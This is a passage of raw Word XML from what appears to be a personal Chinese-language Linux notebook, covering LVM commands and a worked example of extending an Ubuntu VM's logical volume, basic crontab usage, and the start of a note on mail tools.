          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>vs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D0697" w14:textId="696BE5FA" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>vdisplay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9EFBDC" w14:textId="5B8CACDC" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>vcreate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0163F4" w14:textId="50B8995F" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>vremove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59AA86" w14:textId="03E3F1CA" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>vresize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57336C" w14:textId="16B1C65B" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0FFF8" w14:textId="73D41859" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>gextend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDAA253" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077A5975" w14:textId="3643DF6F" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847A173" w14:textId="63A2A000" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>vextend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D72AE" w14:textId="6F09BCF3" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lv</w:t>
      </w:r>
      <w:r>
        <w:t>resize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9F7C87" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03926B20" w14:textId="2487B5DE" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后调整文件系统在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的大小，就会得到正常的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6C5E2" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1387ECB2" w14:textId="3F1BFF7F" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的路径而非命名，一般写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>dev/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AAD0AB" w14:textId="38B3C950" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 100%FREE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是完全大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A58B5E" w14:textId="7B5D91C5" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实战：扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D0A47D" w14:textId="2CAC9313" w:rsidR="002370FF" w:rsidRPr="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对目标虚拟机操作硬盘，变大，如我将虚拟机的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在删除快照的情况下，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0DF28" w14:textId="77777777" w:rsidR="002370FF" w:rsidRPr="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7F2940" w14:textId="634B2DAB" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入虚拟机，我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行管理，因此使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对扩容磁盘进行管理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A59EEA" w14:textId="2E5CBFE2" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对多出来的容量进行分区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出完整分区（大概</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，给该分区打一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。比如，我创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>dev/sda5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256442B7" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC47028" w14:textId="3BE1F5E3" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vcreate /dev/sda5   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D5980" w14:textId="79620D83" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB28C08" w14:textId="3D43FBAC" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>gextend ubuntu-vg /dev/sda5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450BE3C1" w14:textId="2244E789" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>vextend -l +100%FREE ubuntu-vg(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忘了这个有没有用来着</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFE72A" w14:textId="2720C440" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lv</w:t>
      </w:r>
      <w:r>
        <w:t>resize -l +100%FREE /dev/ubuntu-vg/ubuntu-lv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B343E7" w14:textId="2FCCEC4C" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xt4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件格式，则如下重新调整文件系统在分区中的占用大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2FCFD" w14:textId="6D33BEC7" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>esize2fs /dev/ubuntu-vg/ubuntu-lv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A476E" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39ABEFFF" w14:textId="5FADDA30" w:rsidR="002370FF" w:rsidRPr="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E2854" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F19FA92" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A65A7AF" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311C9E22" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC8AB4E" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E676D26" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF2B97A" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4E3245" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFFC878" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED20165" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3961BBEC" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFAAE51" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C746260" w14:textId="77777777" w:rsidR="00CE3C9B" w:rsidRDefault="00CE3C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12118DE3" w14:textId="77777777" w:rsidR="00CE3C9B" w:rsidRDefault="00CE3C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D02440" w14:textId="44096868" w:rsidR="00592AE0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc159779719"/>
      <w:r>
        <w:t>crontab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="207FB30F" w14:textId="77777777" w:rsidR="00592AE0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02956C83" w14:textId="25014F08" w:rsidR="00592AE0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rontab -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12A351" w14:textId="5A9334F7" w:rsidR="00592AE0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现实当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B7EE5" w14:textId="77777777" w:rsidR="00592AE0" w:rsidRPr="00592AE0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512C4E71" w14:textId="6E34C593" w:rsidR="00826BB0" w:rsidRDefault="00592AE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分时日月周</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BE8C5" w14:textId="77777777" w:rsidR="00826BB0" w:rsidRDefault="00826BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4672219F" w14:textId="6B553F85" w:rsidR="00574922" w:rsidRDefault="00574922" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空全部的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务，尽量不要不小心按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F804E67" w14:textId="77777777" w:rsidR="00826BB0" w:rsidRDefault="00826BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03381FC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Toc159779720"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：感觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mailx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都没啥用，不如写个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本还能用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w14:paraId="1B26E6CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E70854A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>！个人总体感觉，linux上的mail、mailx工具，不如下文Python一章的关于mail一节好用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
